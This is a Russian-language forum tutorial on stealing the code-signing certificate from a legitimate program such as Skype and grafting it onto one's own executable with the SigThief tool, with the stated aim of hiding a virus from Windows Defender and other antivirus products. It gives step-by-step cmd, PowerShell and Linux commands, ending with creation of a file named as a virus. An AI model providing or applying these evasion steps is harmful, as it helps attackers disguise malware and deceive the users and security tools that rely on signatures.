Подмена подписи приложения. Или прячем свой вирус от Windows Defender.
сегодня я покажу вам как можно обходить подобные сообщения
при запуска вашего вируса\иного файла.
Обходится это путем подмены лицензионной подписи , и тут сразу вопросы:
Где взять эту подпись чтобы подменить? - Подпись можно будет взять с любого приложения, как? раскажу.
Но ведь эта подпись паленая\не дейсвительная - а нам и не нужно чтоб она была действительная , тк как 99% антивирей и сам дефендер , проверяют её наличие , а не подлинность.
И так начнем .
Нам понадобится:
1. Питон , последней версии ,
2.Сам инструмент - sigthief
3. cmd.exe ( думаю все знают где найти её )
Приступим :
Запускаем cmd.exe ( от админа )
Далее инфа для тех у кого нету PowerShell
Прописываем путь где у вас лежит файл sigthief.py
У меня это вышло вот так :
Далее пишем следующее
sigthief.py -t "файл к которому нужна подпись" (без кавычек) -s "указываем файл подпси" (без кавычек)
Далее в папке с файлов , появляется файл "название.exe_sig" стираем _sig и юзаем ваш файл.
Инфа для тех у кого PowerShell или первый способ не сработал.
Запускаем cmd.exe
Прописываем путь где у вас лежит файл sigthief.py
У меня это вышло вот так :
Далее прописываем PowerShell
Пишем: python sigthief.py -t "файл к которому нужна подпись" (без кавычек) -s "указываем файл подпси" (без кавычек)
Далее в папке с файлов , появляется файл "название.exe_sig" стираем _sig и юзаем ваш файл.
Готово , мы разобрались как подделывать подпись, но где же взять эту подпись??
Заранее выбираем любое приложение с подписью , я взал дефолтный скайп.
Открываем cmd.exe
Прописываем путь где у вас лежит файл sigthief.py
У меня это вышло вот так :
Предварительно закидываем файл у которого будем воровать в папку со скриптом ( sigthief.py )
Прописываем в cmd следующее
sigthief.py -i "путь к файлу у которго нужно стырить" ( без кавычек )ИНТЕРЕСНЫЕ ФАКТЫ:
Данная процедура может убрать несколько детектов на вашем софте не ломая его.
А это, вариант для линуксоидов, как работать с инструментом SigThief.
Он разрывает подпись из файла PE, и добавляет его в другой, исправив таблицу сертификатов для подписания файла. Суть в том что эта подпись, будет пересоздана инструментом, не действительная(фальшивая), это и есть секрет скрытия файла от АВ.
Качаем с гитхаба, заходим в папку, и проверяем "все ли на месте":
Код:
git clone https://github.com/secretsquirrel/SigThief
cd SigThief
ls -l
Можно почитать, README, запускаем скрипт, и смотрим хелп:
Код:
python sigthief.py --help
1. Проверяем Есть ли водпись в .ехе файле(немножко пришлось повозиться чтоб найти файл с сигнатурой)
Код:
python sigthief.py -i '/opt/SigThief/Ruiner.exe' -- нету подписей
python sigthief.py -i '/media/root/UUI/11/Приложения/AGF3DPrinterDriver.exe' -- есть подпись
Примечание: Можно все файлы копировать в папку и запускать напрямую(. /pruebas/+файл), и не вводить путь к файлу. Или перетаскивать файлы в консоль, как это делала я :)
2. Сохранения подписи:
Код:
python sigthief.py -i '[место_к_файлу]/[имя_файла].exe' -r
Снимок экрана от 2017-09-29 23-07-56.png
3. Использовать разорванную подпись:
Код:
python sigthief.py -s [место_к_файлу]/[имя_файла].exe_sig -t [файл_цель].exe
Снимок экрана от 2017-09-29 23-22-43.png
4.Удалять подпись:
Действительно интересные результаты, может помочь вам найти AVs, которые ценят подписи больше чем функциона кода
Код:
python sigthief.py -i [место_к_файлу]/[имя_файла].exe -T
5. Создания файла с чужой подписью:
Код:
python sigthief.py -i '/opt/SigThief/url_pe.exe' -t '/opt/SigThief/Ruiner.exe' -o /tmp/url_pe_virus.exe
Очень важно! Сохранять только в /tmp/
Комментарии